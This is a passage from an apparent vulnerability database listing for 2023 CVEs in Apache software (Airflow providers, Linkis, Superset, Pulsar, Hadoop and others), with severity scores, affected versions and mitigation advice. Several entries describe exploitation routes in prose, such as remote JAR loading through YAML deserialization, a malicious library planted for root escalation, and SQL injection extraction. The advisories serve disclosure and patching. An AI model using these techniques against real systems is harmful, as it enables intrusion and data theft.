Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache apache-airflow-providers-google *
CVE-2023-25692

Improper Input Validation vulnerability in the Apache Airflow Google Provider. This issue affects Apache Airflow Google Provider versions before 8.10.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache apache-airflow-providers-google *
CVE-2023-25693

Improper Input Validation vulnerability in the Apache Airflow Sqoop Provider. This issue affects Apache Airflow Sqoop Provider versions before 3.1.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache airflow_sqoop_provider *
apache apache-airflow-providers-apache-sqoop *
CVE-2023-25695

Generation of Error Message Containing Sensitive Information vulnerability in Apache Software Foundation Apache Airflow.This issue affects Apache Airflow: before 2.5.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-25696

Improper Input Validation vulnerability in the Apache Airflow Hive Provider. This issue affects Apache Airflow Hive Provider versions before 5.1.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache airflow_hive_provider *
apache apache-airflow-providers-apache-hive *
CVE-2023-25753

There exists an SSRF (Server-Side Request Forgery) vulnerability located at the /sandbox/proxyGateway endpoint. This vulnerability allows us to manipulate arbitrary requests and retrieve corresponding responses by inputting any URL into the requestUrl parameter. Of particular concern is our ability to exert control over the HTTP method, cookies, IP address, and headers. This effectively grants us the capability to dispatch complete HTTP requests to hosts of our choosing. This issue affects Apache ShenYu: 2.5.1. Upgrade to Apache ShenYu 2.6.0 or apply patch  https://github.com/apache/shenyu/pull/4776  .

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache shenyu 2.5.1
CVE-2023-25754

Privilege Context Switching Error vulnerability in Apache Software Foundation Apache Airflow.This issue affects Apache Airflow: before 2.6.0.

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-25956

Generation of Error Message Containing Sensitive Information vulnerability in the Apache Airflow AWS Provider. This issue affects Apache Airflow AWS Provider versions before 7.2.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache apache-airflow-providers-amazon *
CVE-2023-26031

Relative library resolution in linux container-executor binary in Apache Hadoop 3.3.1-3.3.4 on Linux allows local user to gain root privileges. If the YARN cluster is accepting work from remote (authenticated) users, this MAY permit remote users to gain root privileges. Hadoop 3.3.0 updated the " YARN Secure Containers https://hadoop.apache.org/docs/stable/hadoop-yarn/hadoop-yarn-site/SecureContainer.html " to add a feature for executing user-submitted applications in isolated linux containers. The native binary HADOOP_HOME/bin/container-executor is used to launch these containers; it must be owned by root and have the suid bit set in order for the YARN processes to run the containers as the specific users submitting the jobs. The patch " YARN-10495 https://issues.apache.org/jira/browse/YARN-10495 . make the rpath of container-executor configurable" modified the library loading path for loading .so files from "$ORIGIN/" to ""$ORIGIN/:../lib/native/". This is the a path through which libcrypto.so is located. Thus it is is possible for a user with reduced privileges to install a malicious libcrypto library into a path to which they have write access, invoke the container-executor command, and have their modified library executed as root. If the YARN cluster is accepting work from remote (authenticated) users, and these users' submitted job are executed in the physical host, rather than a container, then the CVE permits remote users to gain root privileges. The fix for the vulnerability is to revert the change, which is done in YARN-11441 https://issues.apache.org/jira/browse/YARN-11441 , "Revert YARN-10495". This patch is in hadoop-3.3.5. To determine whether a version of container-executor is vulnerable, use the readelf command. If the RUNPATH or RPATH value contains the relative path "./lib/native/" then it is at risk $ readelf -d container-executor|grep 'RUNPATH\|RPATH' 0x000000000000001d (RUNPATH)           Library runpath: [$ORIGIN/:../lib/native/] If it does not, then it is safe: $ readelf -d container-executor|grep 'RUNPATH\|RPATH' 0x000000000000001d (RUNPATH)           Library runpath: [$ORIGIN/] For an at-risk version of container-executor to enable privilege escalation, the owner must be root and the suid bit must be set $ ls -laF /opt/hadoop/bin/container-executor ---Sr-s---. 1 root hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executor A safe installation lacks the suid bit; ideally is also not owned by root. $ ls -laF /opt/hadoop/bin/container-executor -rwxr-xr-x. 1 yarn hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executor This configuration does not support Yarn Secure Containers, but all other hadoop services, including YARN job execution outside secure containers continue to work.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

Products Affected

Vendor Product Version
apache hadoop *
CVE-2023-26268

Design documents with matching document IDs, from databases on the same cluster, may share a mutable Javascript environment when using these design document functions: * validate_doc_update * list * filter * filter views (using view functions as filters) * rewrite * update This doesn't affect map/reduce or search (Dreyfus) index functions. Users are recommended to upgrade to a version that is no longer affected by this issue (Apache CouchDB 3.3.2 or 3.2.3). Workaround: Avoid using design documents from untrusted sources which may attempt to cache or store data in the Javascript environment.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.4 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N 1.3 2.7

Products Affected

Vendor Product Version
apache couchdb *
ibm cloudant *
CVE-2023-26269

Apache James server version 3.7.3 and earlier provides a JMX management service without authentication by default. This allows privilege escalation by a malicious local user. Administrators are advised to disable JMX, or set up a JMX password. Note that version 3.7.4 onward will set up a JMX password automatically for Guice users.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

Products Affected

Vendor Product Version
apache james *
CVE-2023-26464

** UNSUPPORTED WHEN ASSIGNED ** When using the Chainsaw or SocketAppender components with Log4j 1.x on JRE less than 1.7, an attacker that manages to cause a logging entry involving a specially-crafted (ie, deeply nested) hashmap or hashtable (depending on which logging component is in use) to be processed could exhaust the available memory in the virtual machine and achieve Denial of Service when the object is deserialized. This issue affects Apache Log4j before 2. Affected users are recommended to update to Log4j 2.x. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache log4j *
CVE-2023-26512

CWE-502 Deserialization of Untrusted Data at the rabbitmq-connector plugin module in Apache EventMesh (incubating) V1.7.0\V1.8.0 on windows\linux\mac os e.g. platforms allows attackers to send controlled message and remote code execute via rabbitmq messages. Users can use the code under the master branch in project repo to fix this issue, we will release the new version as soon as possible.

Products Affected

Vendor Product Version
apache eventmesh *
apache eventmesh-connector-rabbitmq *
CVE-2023-26513

Excessive Iteration vulnerability in Apache Software Foundation Apache Sling Resource Merger.This issue affects Apache Sling Resource Merger: from 1.2.0 before 1.4.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache sling_resource_merger *
CVE-2023-27296

Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache InLong. It could be triggered by authenticated users of InLong, you could refer to [1] to know more about this vulnerability. This issue affects Apache InLong: from 1.1.0 through 1.5.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick [2] to solve it. [1]  https://programmer.help/blogs/jdbc-deserialization-vulnerability-learning.html https://programmer.help/blogs/jdbc-deserialization-vulnerability-learning.html [2] https://github.com/apache/inlong/pull/7422 https://github.com/apache/inlong/pull/7422

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-27522

HTTP Response Smuggling vulnerability in Apache HTTP Server via mod_proxy_uwsgi. This issue affects Apache HTTP Server: from 2.4.30 through 2.4.55. Special characters in the origin response header can truncate/split the response forwarded to the client.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
unbit uwsgi *
debian debian_linux 10.0
CVE-2023-27523

Improper data authorization check on Jinja templated queries in Apache Superset up to and including 2.1.0 allows for an authenticated user to issue queries on database tables they may not have access to.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.0 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N 3.1 1.4
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-27524

Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config. All superset installations should always set a unique secure random SECRET_KEY. Your SECRET_KEY is used to securely sign all session cookies and encrypting sensitive information on the database. Add a strong SECRET_KEY to your `superset_config.py` file like: SECRET_KEY = <YOUR_OWN_RANDOM_GENERATED_SECRET_KEY> Alternatively you can set it with `SUPERSET_SECRET_KEY` environment variable.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.9 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L 2.2 6.0

Products Affected

Vendor Product Version
apache superset *
CVE-2023-27525

An authenticated user with Gamma role authorization could have access to metadata information using non trivial methods in Apache Superset up to and including 2.0.1

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 3.1 LOW CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N 1.6 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-27526

A non Admin authenticated user could incorrectly create resources using the import charts feature, on Apache Superset up to and including 2.1.0. 

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-27602

In Apache Linkis <=1.3.1, The PublicService module uploads files without restrictions on the path to the uploaded files, and file types. We recommend users upgrade the version of Linkis to version 1.3.2.  For versions <=1.3.1, we suggest turning on the file path check switch in linkis.properties `wds.linkis.workspace.filesystem.owner.check=true` `wds.linkis.workspace.filesystem.path.check=true`

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-27603

In Apache Linkis <=1.3.1, due to the Manager module engineConn material upload does not check the zip path, This is a Zip Slip issue, which will lead to a potential RCE vulnerability. We recommend users upgrade the version of Linkis to version 1.3.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-27604

Apache Airflow Sqoop Provider, versions before 4.0.0, is affected by a vulnerability that allows an attacker pass parameters with the connections, which makes it possible to implement RCE attacks via ‘sqoop import --connect’, obtain airflow server permissions, etc. The attacker needs to be logged in and have authorization (permissions) to create/edit connections. It is recommended to upgrade to a version that is not affected. This issue was reported independently by happyhacking-k, And Xie Jianming and LiuHui of Caiji Sec Team also reported it.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache airflow_sqoop_provider *
CVE-2023-27987

In Apache Linkis <=1.3.1, due to the default token generated by Linkis Gateway deployment being too simple, it is easy for attackers to obtain the default token for the attack. Generation rules should add random values. We recommend users upgrade the version of Linkis to version 1.3.2 And modify the default token value. You can refer to Token authorization[1] https://linkis.apache.org/docs/latest/auth/token https://linkis.apache.org/docs/latest/auth/token

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-28158

Privilege escalation via stored XSS using the file upload service to upload malicious content. The issue can be exploited only by authenticated users which can create directory name to inject some XSS content and gain some privileges such admin user.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7
security@apache.org 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L 2.3 3.7

Products Affected

Vendor Product Version
apache archiva *
CVE-2023-28326

Vendor: The Apache Software Foundation Versions Affected: Apache OpenMeetings from 2.0.0 before 7.0.0 Description: Attacker can elevate their privileges in any room

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2023-28625

mod_auth_openidc is an authentication and authorization module for the Apache 2.x HTTP server that implements the OpenID Connect Relying Party functionality. In versions 2.0.0 through 2.4.13.1, when `OIDCStripCookies` is set and a crafted cookie supplied, a NULL pointer dereference would occur, resulting in a segmentation fault. This could be used in a Denial-of-Service attack and thus presents an availability risk. Version 2.4.13.2 contains a patch for this issue. As a workaround, avoid using `OIDCStripCookies`.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
security-advisories@github.com 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
openidc mod_auth_openidc *
CVE-2023-28706

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Software Foundation Apache Airflow Hive Provider.This issue affects Apache Airflow Hive Provider: before 6.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache airflow_hive_provider *
CVE-2023-28707

Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Drill Provider.This issue affects Apache Airflow Drill Provider: before 2.3.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache apache-airflow-providers-apache-drill *
apache airflow_drill_provider *
CVE-2023-28708

When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0.-M2, 10.1.0-M1 to 10.1.5, 9.0.0-M1 to 9.0.71 and 8.5.0 to 8.5.85 did not include the secure attribute. This could result in the user agent transmitting the session cookie over an insecure channel. Older, EOL versions may also be affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
CVE-2023-28709

The fix for CVE-2023-24998 was incomplete for Apache Tomcat 11.0.0-M2 to 11.0.0-M4, 10.1.5 to 10.1.7, 9.0.71 to 9.0.73 and 8.5.85 to 8.5.87. If non-default HTTP connector settings were used such that the maxParameterCount could be reached using query string parameters and a request was submitted that supplied exactly maxParameterCount parameters in the query string, the limit for uploaded request parts could be bypassed with the potential for a denial of service to occur.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
netapp 7-mode_transition_tool -
debian debian_linux 12.0
CVE-2023-28710

Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Spark Provider.This issue affects Apache Airflow Spark Provider: before 4.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache apache-airflow-providers-apache-spark *
apache airflow_spark_provider *
CVE-2023-28754

Deserialization of Untrusted Data vulnerability in Apache ShardingSphere-Agent, which allows attackers to execute arbitrary code by constructing a special YAML configuration file. The attacker needs to have permission to modify the ShardingSphere Agent YAML configuration file on the target machine, and the target machine can access the URL with the arbitrary code JAR. An attacker can use SnakeYAML to deserialize java.net.URLClassLoader and make it load a JAR from a specified URL, and then deserialize javax.script.ScriptEngineManager to load code using that ClassLoader. When the ShardingSphere JVM process starts and uses the ShardingSphere-Agent, the arbitrary code specified by the attacker will be executed during the deserialization of the YAML configuration file by the Agent. This issue affects ShardingSphere-Agent: through 5.3.2. This vulnerability is fixed in Apache ShardingSphere 5.4.0.

Products Affected

Vendor Product Version
apache shardingsphere *
CVE-2023-28935

** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache UIMA DUCC. When using the "Distributed UIMA Cluster Computing" (DUCC) module of Apache UIMA, an authenticated user that has the permissions to modify core entities can cause command execution as the system user that runs the web process. As the "Distributed UIMA Cluster Computing" module for UIMA is retired, we do not plan to release a fix for this issue. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache unstructured_information_management_architecture -
CVE-2023-28936

Attacker can access arbitrary recording/room Vendor: The Apache Software Foundation Versions Affected: Apache OpenMeetings from 2.0.0 before 7.1.0

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2023-29032

An attacker that has gained access to certain private information can use this to act as other user. Vendor: The Apache Software Foundation Versions Affected: Apache OpenMeetings from 3.1.3 before 7.1.0

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2023-29055

In Apache Kylin version 2.0.0 to 4.0.3, there is a Server Config web interface that displays the content of file 'kylin.properties', that may contain serverside credentials. When the kylin service runs over HTTP (or other plain text protocol), it is possible for network sniffers to hijack the HTTP payload and get access to the content of kylin.properties and potentially the containing credentials. To avoid this threat, users are recommended to  * Always turn on HTTPS so that network payload is encrypted. * Avoid putting credentials in kylin.properties, or at least not in plain text. * Use network firewalls to protect the serverside such that it is not accessible to external attackers. * Upgrade to version Apache Kylin 4.0.4, which filters out the sensitive content that goes to the Server Config web interface.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache kylin *
CVE-2023-29215

In Apache Linkis <=1.3.1, due to the lack of effective filtering of parameters, an attacker configuring malicious Mysql JDBC parameters in JDBC EengineConn Module will trigger a deserialization vulnerability and eventually lead to remote code execution. Therefore, the parameters in the Mysql JDBC URL should be blacklisted. Versions of Apache Linkis <= 1.3.0 will be affected. We recommend users upgrade the version of Linkis to version 1.3.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-29216

In Apache Linkis <=1.3.1, because the parameters are not effectively filtered, the attacker uses the MySQL data source and malicious parameters to configure a new data source to trigger a deserialization vulnerability, eventually leading to remote code execution. Versions of Apache Linkis <= 1.3.0 will be affected. We recommend users upgrade the version of Linkis to version 1.3.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-29234

A deserialization vulnerability existed when decode a malicious package.This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache dubbo *
CVE-2023-29246

An attacker who has gained access to an admin account can perform RCE via null-byte injection Vendor: The Apache Software Foundation Versions Affected: Apache OpenMeetings from 2.0.0 before 7.1.0

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2023-29247

Task instance details page in the UI is vulnerable to a stored XSS.This issue affects Apache Airflow: before 2.6.0.

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-30428

Incorrect Authorization vulnerability in Apache Software Foundation Apache Pulsar Broker's Rest Producer allows authenticated user with a custom HTTP header to produce a message to any topic using the broker's admin role. This issue affects Apache Pulsar Brokers: from 2.9.0 through 2.9.5, from 2.10.0 before 2.10.4, 2.11.0. The vulnerability is exploitable when an attacker can connect directly to the Pulsar Broker. If an attacker is connecting through the Pulsar Proxy, there is no known way to exploit this authorization vulnerability. There are two known risks for affected users. First, an attacker could produce garbage messages to any topic in the cluster. Second, an attacker could produce messages to the topic level policies topic for other tenants and influence topic settings that could lead to exfiltration and/or deletion of messages for other tenants. 2.8 Pulsar Broker users and earlier are unaffected. 2.9 Pulsar Broker users should upgrade to one of the patched versions. 2.10 Pulsar Broker users should upgrade to at least 2.10.4. 2.11 Pulsar Broker users should upgrade to at least 2.11.1. 3.0 Pulsar Broker users are unaffected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.2 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N 1.8 5.8

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.11.0
CVE-2023-30429

Incorrect Authorization vulnerability in Apache Software Foundation Apache Pulsar. This issue affects Apache Pulsar: before 2.10.4, and 2.11.0. When a client connects to the Pulsar Function Worker via the Pulsar Proxy where the Pulsar Proxy uses mTLS authentication to authenticate with the Pulsar Function Worker, the Pulsar Function Worker incorrectly performs authorization by using the Proxy's role for authorization instead of the client's role, which can lead to privilege escalation, especially if the proxy is configured with a superuser role. The recommended mitigation for impacted users is to upgrade the Pulsar Function Worker to a patched version. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.4. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.1. 3.0 Pulsar Function Worker users are unaffected. Any users running the Pulsar Function Worker for 2.9.* and earlier should upgrade to one of the above patched versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 9.6 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N 3.1 5.8

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.11.0
CVE-2023-30465

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.5.0. By manipulating the "orderType" parameter and the ordering of the returned content using an SQL injection attack, an attacker can extract the username of the   user with ID 1 from the "user" table, one character at a time.  Users are advised to upgrade to Apache InLong's 1.6.0 or cherry-pick [1] to solve it. https://programmer.help/blogs/jdbc-deserialization-vulnerability-learning.html [1] https://github.com/apache/inlong/issues/7529 https://github.com/apache/inlong/issues/7529

Products Affected

Vendor Product Version
apache inlong 1.4.0
apache inlong 1.5.0
CVE-2023-30575

Apache Guacamole 1.5.1 and older may incorrectly calculate the lengths of instruction elements sent during the Guacamole protocol handshake, potentially allowing an attacker to inject Guacamole instructions during the handshake through specially-crafted data.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache guacamole *
CVE-2023-30576

Apache Guacamole 0.9.10 through 1.5.1 may continue to reference a freed RDP audio input buffer. Depending on timing, this may allow an attacker to execute arbitrary code with the privileges of the guacd process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N 1.6 5.2

Products Affected

Vendor Product Version
apache guacamole *
CVE-2023-30601

Privilege escalation when enabling FQL/Audit logs allows user with JMX access to run arbitrary commands as the user running Apache Cassandra This issue affects Apache Cassandra: from 4.0.0 through 4.0.9, from 4.1.0 through 4.1.1. WORKAROUND The vulnerability requires nodetool/JMX access to be exploitable, disable access for any non-trusted users. MITIGATION Upgrade to 4.0.10 or 4.1.2 and leave the new FQL/Auditlog configuration property allow_nodetool_archive_command as false.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

Products Affected

Vendor Product Version
apache cassandra *
CVE-2023-30631

Improper Input Validation vulnerability in Apache Software Foundation Apache Traffic Server.  The configuration option proxy.config.http.push_method_enabled didn't function.  However, by default the PUSH method is blocked in the ip_allow configuration file.This issue affects Apache Traffic Server: from 8.0.0 through 9.2.0. 8.x users should upgrade to 8.1.7 or later versions 9.x users should upgrade to 9.2.1 or later versions

Products Affected

Vendor Product Version
fedoraproject fedora 37
fedoraproject fedora 38
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 12.0
debian debian_linux 11.0
CVE-2023-30771

Incorrect Authorization vulnerability in Apache Software Foundation Apache IoTDB.This issue affects the iotdb-web-workbench component on 0.13.3. iotdb-web-workbench is an optional component of IoTDB, providing a web console of the database. This problem is fixed from version 0.13.4 of iotdb-web-workbench onwards.

Products Affected

Vendor Product Version
apache iotdb_web_workbench 0.13.3
CVE-2023-30776

An authenticated user with specific data permissions could access database connections stored passwords by requesting a specific REST API. This issue affects Apache Superset version 1.3.0 up to 2.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2023-30867

In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

Products Affected

Vendor Product Version
apache streampark *
CVE-2023-31007

Improper Authentication vulnerability in Apache Software Foundation Apache Pulsar Broker allows a client to stay connected to a broker after authentication data expires if the client connected through the Pulsar Proxy when the broker is configured with authenticateOriginalAuthData=false or if a client connects directly to a broker with a specially crafted connect command when the broker is configured with authenticateOriginalAuthData=false. This issue affects Apache Pulsar: through 2.9.4, from 2.10.0 through 2.10.3, 2.11.0. 2.9 Pulsar Broker users should upgrade to at least 2.9.5. 2.10 Pulsar Broker users should upgrade to at least 2.10.4. 2.11 Pulsar Broker users should upgrade to at least 2.11.1. 3.0 Pulsar Broker users are unaffected. Any users running the Pulsar Broker for 2.8.* and earlier should upgrade to one of the above patched versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
